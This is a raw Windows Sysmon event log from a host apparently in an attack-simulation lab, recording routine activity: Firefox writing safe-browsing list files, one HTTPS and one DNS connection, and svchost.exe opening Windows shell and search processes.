23542300x80000000000000001050026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\block-flash-digest256.sbstoreMD5=9F6B331AA1E070DCFEED473E76CE56C3,SHA256=7DBBEA2DD387EEB85E1F56E02FC9989ACDE570CD43BFEF2C2A827093BA87DA6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpsetMD5=F7A173C65979416711FAFF47FADFBB44,SHA256=7F018CC32CF471750B6C5322E27E4F1C38097C414E7C6DC6AF9CF31E607431A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstoreMD5=5C71167AC9642FCF7752093F77FBBC89,SHA256=6714F7FBADCCB013DA1D8ECEFA6368A7D193E1F2460477F8AC304EDCF8637AA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpsetMD5=BFED06667174B0D03EE7F88A3DDC9A8C,SHA256=7AE5584755089D28C3A52DCF1EB86E62D4F2E377D61A7D549C6D4EBD53F39B26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstoreMD5=E6AAB64DC2799B4ECC6A6D18F86BD283,SHA256=D72FA31B50E9164371C5B7A3CCA257B99CE12D900FB07DEF942361D76299F5FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\analytics-track-digest256.vlpsetMD5=16E5F327975AC215E9EFA4A4FC5262F5,SHA256=4698D628493E91E42494C8343B7E6469DFC1BFB1F771258C2FB556E84EF314B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\analytics-track-digest256.sbstoreMD5=C3757E7620737B3B6500073B370852FE,SHA256=34B07244F673343E9AC1C775B455C0A60AA95439E83A70B0C6A24E504A88F4B9,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpsetMD5=DE0D88480C24350C59E1E9A3583DE0D1,SHA256=01BA9F0B913E04ED10BD7166796483DD4F72005F249D6EE68B12117BE4B5D3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\ads-track-digest256.vlpsetMD5=8D9E3EEEE577DCE4B0062413A081F9F2,SHA256=D0E3356B67A0BB9BD101D87FA6E23EC2699CC8A25564CD88076663DACF73A9CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\ads-track-digest256.sbstoreMD5=2CC22CF356532158115AB8A0851A9A80,SHA256=6B106FD00C6E27909C9779448E5BDA5FFB96FE2A6FF42636A662AB411D9906DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.357{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=F0A0E73AB1563D94300A5FF98A4D4EC8,SHA256=F5523B366C6D20A56064595DB6D6150FA814E3021915E09865FB2F0D8D50B93E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.342{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.273{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=4A2609D475F48638235EF3C1EE4607CE,SHA256=92D645E1E20A16E63907890C21B99C8AEEBFAA920DA9E7663C43E259886FBAA9,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.273{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-unwanted-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:04.055{466BC892-3152-60E8-240B-00000000CF01}3328C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-890.attackrange.local51068-false172.217.16.138zrh04s06-in-f138.1e100.net443https 354300x80000000000000001050010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:04.054{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55941- 23542300x80000000000000001050009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.257{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=33287B256C94A051C011EB4B2777550C,SHA256=FF74549543054CC5BEA457049650367960DA1D6D66566B77E4FFE206F14C1D84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.257{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-malware-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.242{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=5AE80998F1A6D08F1791EAD23EDC7405,SHA256=0F8E615DE60E94815B231AA748BE551BE5D060509466CB948A93917C0BF87618,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.178{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:12.095{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:12.095{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:12.094{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:12.094{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:12.094{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:12.092{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:12.092{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:12.092{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:12.092{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:12.091{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
